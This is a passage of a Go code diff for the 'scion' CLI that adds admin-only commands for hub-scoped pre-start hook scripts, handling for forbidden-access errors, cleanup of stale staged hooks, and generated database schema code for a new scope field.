+)
+
+// hubHookCmd is the parent command for `scion hub hook`.
+var hubHookCmd = &cobra.Command{
+	Use:     "hook",
+	Aliases: []string{"psh"},
+	Short:   "Manage hub-scoped pre-start hooks",
+	Long: `Manage the hub-wide shell script that runs before every agent starts.
+
+A hub-scoped pre-start hook is a named shell script staged at
+$HOME/.scion/hooks/pre-start.d/30-project-custom before an agent container
+starts. Exactly one hub hook may be active at a time; creating or activating a
+new hook automatically archives the previous one.
+
+The hub hook is a fallback: a project that has its own active pre-start hook
+uses that hook instead. Only projects with no active project-scoped hook get
+the hub hook.
+
+If the hook script exits non-zero, agent startup is aborted.
+
+Managing hub hooks requires hub administrator privileges.
+
+Examples:
+  scion hub hook list
+  scion hub hook create --name "Baseline tools" --script setup.sh
+  cat setup.sh | scion hub hook create --name "Baseline tools" --script -
+  scion hub hook show <id-or-slug>
+  scion hub hook update <id-or-slug> --script new-setup.sh
+  scion hub hook activate <id-or-slug>
+  scion hub hook delete <id-or-slug>`,
+}
+
+var hubHookListCmd = &cobra.Command{
+	Use:     "list",
+	Aliases: []string{"ls"},
+	Short:   "List hub-scoped pre-start hooks",
+	Args:    cobra.NoArgs,
+	RunE:    runHubHookList,
+}
+
+var hubHookShowCmd = &cobra.Command{
+	Use:   "show <id-or-slug>",
+	Short: "Show details of a hub-scoped pre-start hook",
+	Args:  cobra.ExactArgs(1),
+	RunE:  runHubHookShow,
+}
+
+var hubHookCreateCmd = &cobra.Command{
+	Use:   "create",
+	Short: "Create a new hub-scoped pre-start hook (archives any current active hook)",
+	Args:  cobra.NoArgs,
+	RunE:  runHubHookCreate,
+}
+
+var hubHookUpdateCmd = &cobra.Command{
+	Use:   "update <id-or-slug>",
+	Short: "Update an existing hub-scoped pre-start hook",
+	Args:  cobra.ExactArgs(1),
+	RunE:  runHubHookUpdate,
+}
+
+var hubHookActivateCmd = &cobra.Command{
+	Use:   "activate <id-or-slug>",
+	Short: "Activate an archived hub-scoped pre-start hook",
+	Long: `Mark an archived hub-scoped pre-start hook as active. The current active hub
+hook (if any) is automatically archived.`,
+	Args: cobra.ExactArgs(1),
+	RunE: runHubHookActivate,
+}
+
+var hubHookDeleteCmd = &cobra.Command{
+	Use:     "delete <id-or-slug>",
+	Aliases: []string{"rm", "remove"},
+	Short:   "Delete an archived hub-scoped pre-start hook",
+	Long: `Delete a hub-scoped pre-start hook. Archived hooks may be deleted directly.
+Deleting the active hook requires --force, and the Hub still refuses the delete
+when other hub hooks exist — activate a different hook first in that case.`,
+	Args: cobra.ExactArgs(1),
+	RunE: runHubHookDelete,
+}
+
+// Flags for create/update/delete.
+var (
+	hubHookName        string
+	hubHookSlug        string
+	hubHookDescription string
+	hubHookScript      string // file path or "-" for stdin
+	hubHookForce       bool
+)
+
+func init() {
+	hubHookCmd.AddCommand(hubHookListCmd)
+	hubHookCmd.AddCommand(hubHookShowCmd)
+	hubHookCmd.AddCommand(hubHookCreateCmd)
+	hubHookCmd.AddCommand(hubHookUpdateCmd)
+	hubHookCmd.AddCommand(hubHookActivateCmd)
+	hubHookCmd.AddCommand(hubHookDeleteCmd)
+
+	// Create flags.
+	hubHookCreateCmd.Flags().StringVar(&hubHookName, "name", "", "Human-readable name for the hook (required)")
+	hubHookCreateCmd.Flags().StringVar(&hubHookSlug, "slug", "", "URL-safe slug (derived from name if omitted)")
+	hubHookCreateCmd.Flags().StringVar(&hubHookDescription, "description", "", "Optional description")
+	hubHookCreateCmd.Flags().StringVar(&hubHookScript, "script", "", `Path to shell script file, or "-" to read from stdin (required)`)
+	_ = hubHookCreateCmd.MarkFlagRequired("name")
+	_ = hubHookCreateCmd.MarkFlagRequired("script")
+
+	// Update flags.
+	hubHookUpdateCmd.Flags().StringVar(&hubHookName, "name", "", "New name for the hook")
+	hubHookUpdateCmd.Flags().StringVar(&hubHookDescription, "description", "", "New description")
+	hubHookUpdateCmd.Flags().StringVar(&hubHookScript, "script", "", `Path to updated shell script, or "-" to read from stdin`)
+
+	// Delete flags.
+	hubHookDeleteCmd.Flags().BoolVar(&hubHookForce, "force", false, "Allow deleting the currently active hub hook")
+}
+
+// resolveHubHookClient resolves the Hub client and returns a
+// HubPreStartHookService. Unlike project hooks, no project ID is involved:
+// hub hooks live at the hub scope and require hub administrator privileges.
+func resolveHubHookClient() (hubclient.HubPreStartHookService, error) {
+	resolvedPath, _, err := config.ResolveProjectPath(projectPath)
+	if err != nil {
+		return nil, fmt.Errorf("failed to resolve project path: %w", err)
+	}
+
+	settings, err := config.LoadSettings(resolvedPath)
+	if err != nil {
+		return nil, fmt.Errorf("failed to load settings: %w", err)
+	}
+
+	client, err := getHubClient(settings)
+	if err != nil {
+		return nil, err
+	}
+
+	return client.HubPreStartHooks(), nil
+}
+
+// resolveHubHookID resolves a slug-or-ID to a hook UUID by listing if needed.
+func resolveHubHookID(ctx context.Context, svc hubclient.HubPreStartHookService, idOrSlug string) (string, error) {
+	// If it already looks like a UUID, use it directly.
+	if isUUIDLike(idOrSlug) {
+		return idOrSlug, nil
+	}
+	// Otherwise treat it as a slug and search the list.
+	list, err := svc.List(ctx)
+	if err != nil {
+		return "", fmt.Errorf("list hooks to resolve slug: %w", err)
+	}
+	for _, h := range list.Hooks {
+		if h.Slug == idOrSlug || h.Name == idOrSlug {
+			return h.ID, nil
+		}
+	}
+	return "", fmt.Errorf("no hub pre-start hook found with slug or name %q", idOrSlug)
+}
+
+func runHubHookList(cmd *cobra.Command, args []string) error {
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	svc, err := resolveHubHookClient()
+	if err != nil {
+		return err
+	}
+
+	list, err := svc.List(ctx)
+	if err != nil {
+		if apiclient.IsUnauthorizedError(err) {
+			return fmt.Errorf("not authorized to view hub pre-start hooks; run 'scion hub auth login'")
+		}
+		return fmt.Errorf("list hub pre-start hooks: %w", err)
+	}
+
+	if isJSONOutput() {
+		return outputJSON(list)
+	}
+
+	if len(list.Hooks) == 0 {
+		fmt.Println("No hub-scoped pre-start hooks configured.")
+		return nil
+	}
+
+	tw := tabwriter.NewWriter(os.Stdout, 0, 0, 2, ' ', 0)
+	fmt.Fprintln(tw, "ID\tSLUG\tNAME\tSTATUS\tCREATED")
+	for _, h := range list.Hooks {
+		created := h.Created.Format("2006-01-02")
+		fmt.Fprintf(tw, "%s\t%s\t%s\t%s\t%s\n", h.ID, h.Slug, h.Name, h.Status, created)
+	}
+	return tw.Flush()
+}
+
+func runHubHookShow(cmd *cobra.Command, args []string) error {
+	hookRef := args[0]
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	svc, err := resolveHubHookClient()
+	if err != nil {
+		return err
+	}
+
+	hookID, err := resolveHubHookID(ctx, svc, hookRef)
+	if err != nil {
+		return err
+	}
+
+	hook, err := svc.Get(ctx, hookID)
+	if err != nil {
+		if apiclient.IsNotFoundError(err) {
+			return fmt.Errorf("hub hook %q not found", hookRef)
+		}
+		if apiclient.IsUnauthorizedError(err) {
+			return fmt.Errorf("not authorized to view hub pre-start hooks; run 'scion hub auth login'")
+		}
+		return fmt.Errorf("get hub hook: %w", err)
+	}
+
+	if isJSONOutput() {
+		return outputJSON(hook)
+	}
+
+	fmt.Printf("ID:          %s\n", hook.ID)
+	fmt.Printf("Name:        %s\n", hook.Name)
+	fmt.Printf("Slug:        %s\n", hook.Slug)
+	fmt.Printf("Scope:       %s\n", store.PreStartHookScopeHub)
+	fmt.Printf("Status:      %s\n", hook.Status)
+	if hook.Description != "" {
+		fmt.Printf("Description: %s\n", hook.Description)
+	}
+	fmt.Printf("Created:     %s\n", hook.Created.Format(time.RFC3339))
+	fmt.Printf("Updated:     %s\n", hook.Updated.Format(time.RFC3339))
+	fmt.Println("Script:")
+	fmt.Println(strings.Repeat("-", 60))
+	fmt.Println(hook.Script)
+	return nil
+}
+
+func runHubHookCreate(cmd *cobra.Command, args []string) error {
+	scriptContent, err := readScriptContent(hubHookScript)
+	if err != nil {
+		return err
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	svc, err := resolveHubHookClient()
+	if err != nil {
+		return err
+	}
+
+	hook, err := svc.Create(ctx, &hubclient.CreateProjectPreStartHookRequest{
+		Name:        hubHookName,
+		Slug:        hubHookSlug,
+		Description: hubHookDescription,
+		Script:      scriptContent,
+	})
+	if err != nil {
+		if apiclient.IsUnauthorizedError(err) {
+			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
+		}
+		return fmt.Errorf("create hub pre-start hook: %w", err)
+	}
+
+	if isJSONOutput() {
+		return outputJSON(hook)
+	}
+
+	fmt.Printf("Created hub pre-start hook %q (ID: %s, status: %s)\n", hook.Name, hook.ID, hook.Status)
+	return nil
+}
+
+func runHubHookUpdate(cmd *cobra.Command, args []string) error {
+	hookRef := args[0]
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	svc, err := resolveHubHookClient()
+	if err != nil {
+		return err
+	}
+
+	hookID, err := resolveHubHookID(ctx, svc, hookRef)
+	if err != nil {
+		return err
+	}
+
+	req := &hubclient.UpdateProjectPreStartHookRequest{}
+
+	if cmd.Flags().Changed("name") {
+		v := hubHookName
+		req.Name = &v
+	}
+	if cmd.Flags().Changed("description") {
+		v := hubHookDescription
+		req.Description = &v
+	}
+	if cmd.Flags().Changed("script") {
+		scriptContent, err := readScriptContent(hubHookScript)
+		if err != nil {
+			return err
+		}
+		req.Script = &scriptContent
+	}
+
+	hook, err := svc.Update(ctx, hookID, req)
+	if err != nil {
+		if apiclient.IsUnauthorizedError(err) {
+			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
+		}
+		return fmt.Errorf("update hub pre-start hook: %w", err)
+	}
+
+	if isJSONOutput() {
+		return outputJSON(hook)
+	}
+
+	fmt.Printf("Updated hub pre-start hook %q (ID: %s)\n", hook.Name, hook.ID)
+	return nil
+}
+
+func runHubHookActivate(cmd *cobra.Command, args []string) error {
+	hookRef := args[0]
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	svc, err := resolveHubHookClient()
+	if err != nil {
+		return err
+	}
+
+	hookID, err := resolveHubHookID(ctx, svc, hookRef)
+	if err != nil {
+		return err
+	}
+
+	hook, err := svc.Activate(ctx, hookID)
+	if err != nil {
+		if apiclient.IsUnauthorizedError(err) {
+			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
+		}
+		return fmt.Errorf("activate hub pre-start hook: %w", err)
+	}
+
+	if isJSONOutput() {
+		return outputJSON(hook)
+	}
+
+	fmt.Printf("Activated hub pre-start hook %q (ID: %s)\n", hook.Name, hook.ID)
+	return nil
+}
+
+func runHubHookDelete(cmd *cobra.Command, args []string) error {
+	hookRef := args[0]
+
+	ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
+	defer cancel()
+
+	svc, err := resolveHubHookClient()
+	if err != nil {
+		return err
+	}
+
+	hookID, err := resolveHubHookID(ctx, svc, hookRef)
+	if err != nil {
+		return err
+	}
+
+	// Deleting the currently active hub hook removes the hub-wide fallback for
+	// every project, so require an explicit --force.
+	if !hubHookForce {
+		hook, err := svc.Get(ctx, hookID)
+		if err != nil {
+			if apiclient.IsNotFoundError(err) {
+				return fmt.Errorf("hub hook %q not found", hookRef)
+			}
+			if apiclient.IsUnauthorizedError(err) {
+				return fmt.Errorf("not authorized to view hub pre-start hooks; run 'scion hub auth login'")
+			}
+			return fmt.Errorf("get hub hook: %w", err)
+		}
+		if hook.Status == store.ProjectPreStartHookStatusActive {
+			return fmt.Errorf("hub hook %q is active; re-run with --force to delete it", hookRef)
+		}
+	}
+
+	if err := svc.Delete(ctx, hookID); err != nil {
+		if apiclient.IsUnauthorizedError(err) {
+			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
+		}
+		return fmt.Errorf("delete hub pre-start hook: %w", err)
+	}
+
+	if isJSONOutput() {
+		return outputJSON(map[string]string{"deleted": hookID})
+	}
+
+	fmt.Printf("Deleted hub pre-start hook (ID: %s)\n", hookID)
+	return nil
+}

--- a/cmd/hub_pre_start_hook.go
+++ b/cmd/hub_pre_start_hook.go
@@ -103,7 +103,12 @@ var hubHookDeleteCmd = &cobra.Command{
 	Short:   "Delete an archived hub-scoped pre-start hook",
 	Long: `Delete a hub-scoped pre-start hook. Archived hooks may be deleted directly.
 Deleting the active hook requires --force, and the Hub still refuses the delete
-when other hub hooks exist — activate a different hook first in that case.`,
+when other hub hooks exist — activate a different hook first in that case.
+
+Note: deleting a hub hook only prevents it from being applied to future agents.
+Agents already created continue to run the hook script on every restart until
+they are recreated (the script is baked into the agent's applied configuration
+at creation time).`,
 	Args: cobra.ExactArgs(1),
 	RunE: runHubHookDelete,
 }
@@ -194,7 +199,7 @@ func runHubHookList(cmd *cobra.Command, args []string) error {
 
 	list, err := svc.List(ctx)
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to view hub pre-start hooks; run 'scion hub auth login'")
 		}
 		return fmt.Errorf("list hub pre-start hooks: %w", err)
@@ -239,7 +244,7 @@ func runHubHookShow(cmd *cobra.Command, args []string) error {
 		if apiclient.IsNotFoundError(err) {
 			return fmt.Errorf("hub hook %q not found", hookRef)
 		}
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to view hub pre-start hooks; run 'scion hub auth login'")
 		}
 		return fmt.Errorf("get hub hook: %w", err)
@@ -286,7 +291,7 @@ func runHubHookCreate(cmd *cobra.Command, args []string) error {
 		Script:      scriptContent,
 	})
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
 		}
 		return fmt.Errorf("create hub pre-start hook: %w", err)
@@ -336,7 +341,7 @@ func runHubHookUpdate(cmd *cobra.Command, args []string) error {
 
 	hook, err := svc.Update(ctx, hookID, req)
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
 		}
 		return fmt.Errorf("update hub pre-start hook: %w", err)
@@ -368,7 +373,7 @@ func runHubHookActivate(cmd *cobra.Command, args []string) error {
 
 	hook, err := svc.Activate(ctx, hookID)
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
 		}
 		return fmt.Errorf("activate hub pre-start hook: %w", err)
@@ -406,7 +411,7 @@ func runHubHookDelete(cmd *cobra.Command, args []string) error {
 			if apiclient.IsNotFoundError(err) {
 				return fmt.Errorf("hub hook %q not found", hookRef)
 			}
-			if apiclient.IsUnauthorizedError(err) {
+			if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 				return fmt.Errorf("not authorized to view hub pre-start hooks; run 'scion hub auth login'")
 			}
 			return fmt.Errorf("get hub hook: %w", err)
@@ -417,7 +422,7 @@ func runHubHookDelete(cmd *cobra.Command, args []string) error {
 	}
 
 	if err := svc.Delete(ctx, hookID); err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage hub pre-start hooks (hub administrator required)")
 		}
 		return fmt.Errorf("delete hub pre-start hook: %w", err)
@@ -428,5 +433,7 @@ func runHubHookDelete(cmd *cobra.Command, args []string) error {
 	}
 
 	fmt.Printf("Deleted hub pre-start hook (ID: %s)\n", hookID)
+	fmt.Println("Note: agents created before this delete keep running the hook on every " +
+		"restart until they are recreated.")
 	return nil
 }

--- a/cmd/project_pre_start_hook.go
+++ b/cmd/project_pre_start_hook.go
@@ -98,7 +98,12 @@ var projectHookDeleteCmd = &cobra.Command{
 	Short:   "Delete an archived pre-start hook",
 	Long: `Delete a pre-start hook. Only archived hooks may be deleted. To delete
 the active hook, first activate a different hook (or there is no replacement),
-then delete it.`,
+then delete it.
+
+Note: deleting a hook only prevents it from being applied to future agents.
+Agents already created continue to run the hook script on every restart until
+they are recreated (the script is baked into the agent's applied configuration
+at creation time).`,
 	Args: cobra.RangeArgs(1, 2),
 	RunE: runProjectHookDelete,
 }
@@ -331,7 +336,7 @@ func runProjectHookCreate(cmd *cobra.Command, args []string) error {
 		Script:      scriptContent,
 	})
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage pre-start hooks for this project")
 		}
 		return fmt.Errorf("create pre-start hook: %w", err)
@@ -381,7 +386,7 @@ func runProjectHookUpdate(cmd *cobra.Command, args []string) error {
 
 	hook, err := svc.Update(ctx, hookID, req)
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage pre-start hooks for this project")
 		}
 		return fmt.Errorf("update pre-start hook: %w", err)
@@ -413,7 +418,7 @@ func runProjectHookActivate(cmd *cobra.Command, args []string) error {
 
 	hook, err := svc.Activate(ctx, hookID)
 	if err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage pre-start hooks for this project")
 		}
 		return fmt.Errorf("activate pre-start hook: %w", err)
@@ -444,7 +449,7 @@ func runProjectHookDelete(cmd *cobra.Command, args []string) error {
 	}
 
 	if err := svc.Delete(ctx, hookID); err != nil {
-		if apiclient.IsUnauthorizedError(err) {
+		if apiclient.IsUnauthorizedError(err) || apiclient.IsForbiddenError(err) {
 			return fmt.Errorf("not authorized to manage pre-start hooks for this project")
 		}
 		return fmt.Errorf("delete pre-start hook: %w", err)

--- a/pkg/agent/provision.go
+++ b/pkg/agent/provision.go
@@ -370,7 +370,11 @@ func (m *AgentManager) Provision(ctx context.Context, opts api.StartOptions) (*a
 	// pre-start.d/30-project-custom so it runs after the harness provisioner
 	// (20-harness-provision). A staging failure is fatal — the project owner
 	// explicitly configured this script and a silent skip would be misleading.
-	if opts.ProjectPreStartHookScript != "" {
+	//
+	// Called unconditionally: with an empty script the helper removes any
+	// previously staged file, so a hook that no longer applies cannot survive
+	// on a reused agent home.
+	{
 		agentHome := config.GetAgentHomePath(opts.ProjectPath, opts.Name)
 		if err := harness.WriteProjectPreStartHook(agentHome, opts.ProjectPreStartHookScript); err != nil {
 			return cfg, fmt.Errorf("stage project pre-start hook: %w", err)

--- a/pkg/agent/run.go
+++ b/pkg/agent/run.go
@@ -437,10 +437,10 @@ func (m *AgentManager) Start(ctx context.Context, opts api.StartOptions) (*api.A
 	// so no Hub round-trip is needed. A write failure is fatal: if the file is
 	// absent on a fresh restart the abort guard in init.go (projectHookStaged)
 	// will not fire, so the hook would silently not run — worse than aborting.
-	if opts.ProjectPreStartHookScript != "" {
-		if err := harness.WriteProjectPreStartHook(agentHome, opts.ProjectPreStartHookScript); err != nil {
-			return nil, fmt.Errorf("re-stage project pre-start hook: %w", err)
-		}
+	// Called unconditionally: with an empty script the helper clears any file
+	// staged by an earlier occupant of this agent home.
+	if err := harness.WriteProjectPreStartHook(agentHome, opts.ProjectPreStartHookScript); err != nil {
+		return nil, fmt.Errorf("re-stage project pre-start hook: %w", err)
 	}
 
 	// Resolve auth metadata for the config-driven env var pipeline.

--- a/pkg/apiclient/errors.go
+++ b/pkg/apiclient/errors.go
@@ -188,6 +188,17 @@ func IsUnauthorizedError(err error) bool {
 	return false
 }
 
+// IsForbiddenError checks if an error is a forbidden (403) API error.
+// Note this is distinct from IsUnauthorizedError, which matches 401 only:
+// an authenticated caller who lacks the required role gets 403.
+func IsForbiddenError(err error) bool {
+	var apiErr *APIError
+	if errors.As(err, &apiErr) {
+		return apiErr.IsForbidden()
+	}
+	return false
+}
+
 // IsConflictError checks if an error is a conflict API error.
 func IsConflictError(err error) bool {
 	var apiErr *APIError

--- a/pkg/ent/migrate/schema.go
+++ b/pkg/ent/migrate/schema.go
@@ -835,7 +835,8 @@ var (
 	// ProjectPreStartHooksColumns holds the columns for the "project_pre_start_hooks" table.
 	ProjectPreStartHooksColumns = []*schema.Column{
 		{Name: "id", Type: field.TypeUUID},
-		{Name: "project_id", Type: field.TypeString},
+		{Name: "scope", Type: field.TypeEnum, Enums: []string{"project", "hub"}, Default: "project"},
+		{Name: "project_id", Type: field.TypeString, Nullable: true, Default: ""},
 		{Name: "name", Type: field.TypeString},
 		{Name: "slug", Type: field.TypeString},
 		{Name: "description", Type: field.TypeString, Nullable: true},
@@ -853,14 +854,19 @@ var (
 		PrimaryKey: []*schema.Column{ProjectPreStartHooksColumns[0]},
 		Indexes: []*schema.Index{
 			{
-				Name:    "projectprestarthook_project_id_slug",
+				Name:    "projectprestarthook_scope_project_id_slug",
 				Unique:  true,
-				Columns: []*schema.Column{ProjectPreStartHooksColumns[1], ProjectPreStartHooksColumns[3]},
+				Columns: []*schema.Column{ProjectPreStartHooksColumns[1], ProjectPreStartHooksColumns[2], ProjectPreStartHooksColumns[4]},
 			},
 			{
 				Name:    "projectprestarthook_project_id_status",
 				Unique:  false,
-				Columns: []*schema.Column{ProjectPreStartHooksColumns[1], ProjectPreStartHooksColumns[6]},
+				Columns: []*schema.Column{ProjectPreStartHooksColumns[2], ProjectPreStartHooksColumns[7]},
+			},
+			{
+				Name:    "projectprestarthook_scope_status",
+				Unique:  false,
+				Columns: []*schema.Column{ProjectPreStartHooksColumns[1], ProjectPreStartHooksColumns[7]},
 			},
 		},
 	}

--- a/pkg/ent/mutation.go
+++ b/pkg/ent/mutation.go
@@ -27048,6 +27048,7 @@ type ProjectPreStartHookMutation struct {
 	op            Op
 	typ           string
 	id            *uuid.UUID
+	scope         *projectprestarthook.Scope
 	project_id    *string
 	name          *string
 	slug          *string
@@ -27168,6 +27169,42 @@ func (m *ProjectPreStartHookMutation) IDs(ctx context.Context) ([]uuid.UUID, err
 	}
 }
 
+// SetScope sets the "scope" field.
+func (m *ProjectPreStartHookMutation) SetScope(pr projectprestarthook.Scope) {
+	m.scope = &pr
+}
+
+// Scope returns the value of the "scope" field in the mutation.
+func (m *ProjectPreStartHookMutation) Scope() (r projectprestarthook.Scope, exists bool) {
+	v := m.scope
+	if v == nil {
+		return
+	}
+	return *v, true
+}
+
+// OldScope returns the old "scope" field's value of the ProjectPreStartHook entity.
+// If the ProjectPreStartHook object wasn't provided to the builder, the object is fetched from the database.
+// An error is returned if the mutation operation is not UpdateOne, or the database query fails.
+func (m *ProjectPreStartHookMutation) OldScope(ctx context.Context) (v projectprestarthook.Scope, err error) {
+	if !m.op.Is(OpUpdateOne) {
+		return v, errors.New("OldScope is only allowed on UpdateOne operations")
+	}
+	if m.id == nil || m.oldValue == nil {
+		return v, errors.New("OldScope requires an ID field in the mutation")
+	}
+	oldValue, err := m.oldValue(ctx)
+	if err != nil {
+		return v, fmt.Errorf("querying old value for OldScope: %w", err)
+	}
+	return oldValue.Scope, nil
+}
+
+// ResetScope resets all changes to the "scope" field.
+func (m *ProjectPreStartHookMutation) ResetScope() {
+	m.scope = nil
+}
+
 // SetProjectID sets the "project_id" field.
 func (m *ProjectPreStartHookMutation) SetProjectID(s string) {
 	m.project_id = &s
@@ -27199,9 +27236,22 @@ func (m *ProjectPreStartHookMutation) OldProjectID(ctx context.Context) (v strin
 	return oldValue.ProjectID, nil
 }
 
+// ClearProjectID clears the value of the "project_id" field.
+func (m *ProjectPreStartHookMutation) ClearProjectID() {
+	m.project_id = nil
+	m.clearedFields[projectprestarthook.FieldProjectID] = struct{}{}
+}
+
+// ProjectIDCleared returns if the "project_id" field was cleared in this mutation.
+func (m *ProjectPreStartHookMutation) ProjectIDCleared() bool {
+	_, ok := m.clearedFields[projectprestarthook.FieldProjectID]
+	return ok
+}
+
 // ResetProjectID resets all changes to the "project_id" field.
 func (m *ProjectPreStartHookMutation) ResetProjectID() {
 	m.project_id = nil
+	delete(m.clearedFields, projectprestarthook.FieldProjectID)
 }
 
 // SetName sets the "name" field.
@@ -27601,7 +27651,10 @@ func (m *ProjectPreStartHookMutation) Type() string {
 // order to get all numeric fields that were incremented/decremented, call
 // AddedFields().
 func (m *ProjectPreStartHookMutation) Fields() []string {
-	fields := make([]string, 0, 10)
+	fields := make([]string, 0, 11)
+	if m.scope != nil {
+		fields = append(fields, projectprestarthook.FieldScope)
+	}
 	if m.project_id != nil {
 		fields = append(fields, projectprestarthook.FieldProjectID)
 	}
@@ -27640,6 +27693,8 @@ func (m *ProjectPreStartHookMutation) Fields() []string {
 // schema.
 func (m *ProjectPreStartHookMutation) Field(name string) (ent.Value, bool) {
 	switch name {
+	case projectprestarthook.FieldScope:
+		return m.Scope()
 	case projectprestarthook.FieldProjectID:
 		return m.ProjectID()
 	case projectprestarthook.FieldName:
@@ -27669,6 +27724,8 @@ func (m *ProjectPreStartHookMutation) Field(name string) (ent.Value, bool) {
 // database failed.
 func (m *ProjectPreStartHookMutation) OldField(ctx context.Context, name string) (ent.Value, error) {
 	switch name {
+	case projectprestarthook.FieldScope:
+		return m.OldScope(ctx)
 	case projectprestarthook.FieldProjectID:
 		return m.OldProjectID(ctx)
 	case projectprestarthook.FieldName:
@@ -27698,6 +27755,13 @@ func (m *ProjectPreStartHookMutation) OldField(ctx context.Context, name string)
 // type.
 func (m *ProjectPreStartHookMutation) SetField(name string, value ent.Value) error {
 	switch name {
+	case projectprestarthook.FieldScope:
+		v, ok := value.(projectprestarthook.Scope)
+		if !ok {
+			return fmt.Errorf("unexpected type %T for field %s", value, name)
+		}
+		m.SetScope(v)
+		return nil
 	case projectprestarthook.FieldProjectID:
 		v, ok := value.(string)
 		if !ok {
@@ -27798,6 +27862,9 @@ func (m *ProjectPreStartHookMutation) AddField(name string, value ent.Value) err
 // mutation.
 func (m *ProjectPreStartHookMutation) ClearedFields() []string {
 	var fields []string
+	if m.FieldCleared(projectprestarthook.FieldProjectID) {
+		fields = append(fields, projectprestarthook.FieldProjectID)
+	}
 	if m.FieldCleared(projectprestarthook.FieldDescription) {
 		fields = append(fields, projectprestarthook.FieldDescription)
 	}
@@ -27821,6 +27888,9 @@ func (m *ProjectPreStartHookMutation) FieldCleared(name string) bool {
 // error if the field is not defined in the schema.
 func (m *ProjectPreStartHookMutation) ClearField(name string) error {
 	switch name {
+	case projectprestarthook.FieldProjectID:
+		m.ClearProjectID()
+		return nil
 	case projectprestarthook.FieldDescription:
 		m.ClearDescription()
 		return nil
@@ -27838,6 +27908,9 @@ func (m *ProjectPreStartHookMutation) ClearField(name string) error {
 // It returns an error if the field is not defined in the schema.
 func (m *ProjectPreStartHookMutation) ResetField(name string) error {
 	switch name {
+	case projectprestarthook.FieldScope:
+		m.ResetScope()
+		return nil
 	case projectprestarthook.FieldProjectID:
 		m.ResetProjectID()
 		return nil

--- a/pkg/ent/projectprestarthook.go
+++ b/pkg/ent/projectprestarthook.go
@@ -18,6 +18,8 @@ type ProjectPreStartHook struct {
 	config `json:"-"`
 	// ID of the ent.
 	ID uuid.UUID `json:"id,omitempty"`
+	// Scope holds the value of the "scope" field.
+	Scope projectprestarthook.Scope `json:"scope,omitempty"`
 	// ProjectID holds the value of the "project_id" field.
 	ProjectID string `json:"project_id,omitempty"`
 	// Name holds the value of the "name" field.
@@ -46,7 +48,7 @@ func (*ProjectPreStartHook) scanValues(columns []string) ([]any, error) {
 	values := make([]any, len(columns))
 	for i := range columns {
 		switch columns[i] {
-		case projectprestarthook.FieldProjectID, projectprestarthook.FieldName, projectprestarthook.FieldSlug, projectprestarthook.FieldDescription, projectprestarthook.FieldScript, projectprestarthook.FieldStatus, projectprestarthook.FieldCreatedBy, projectprestarthook.FieldUpdatedBy:
+		case projectprestarthook.FieldScope, projectprestarthook.FieldProjectID, projectprestarthook.FieldName, projectprestarthook.FieldSlug, projectprestarthook.FieldDescription, projectprestarthook.FieldScript, projectprestarthook.FieldStatus, projectprestarthook.FieldCreatedBy, projectprestarthook.FieldUpdatedBy:
 			values[i] = new(sql.NullString)
 		case projectprestarthook.FieldCreated, projectprestarthook.FieldUpdated:
 			values[i] = new(sql.NullTime)
@@ -72,6 +74,12 @@ func (_m *ProjectPreStartHook) assignValues(columns []string, values []any) erro
 				return fmt.Errorf("unexpected type %T for field id", values[i])
 			} else if value != nil {
 				_m.ID = *value
+			}
+		case projectprestarthook.FieldScope:
+			if value, ok := values[i].(*sql.NullString); !ok {
+				return fmt.Errorf("unexpected type %T for field scope", values[i])
+			} else if value.Valid {
+				_m.Scope = projectprestarthook.Scope(value.String)
 			}
 		case projectprestarthook.FieldProjectID:
 			if value, ok := values[i].(*sql.NullString); !ok {
@@ -169,6 +177,9 @@ func (_m *ProjectPreStartHook) String() string {
 	var builder strings.Builder
 	builder.WriteString("ProjectPreStartHook(")
 	builder.WriteString(fmt.Sprintf("id=%v, ", _m.ID))
+	builder.WriteString("scope=")
+	builder.WriteString(fmt.Sprintf("%v", _m.Scope))
+	builder.WriteString(", ")
 	builder.WriteString("project_id=")
 	builder.WriteString(_m.ProjectID)
 	builder.WriteString(", ")

--- a/pkg/ent/projectprestarthook/projectprestarthook.go
+++ b/pkg/ent/projectprestarthook/projectprestarthook.go
@@ -15,6 +15,8 @@ const (
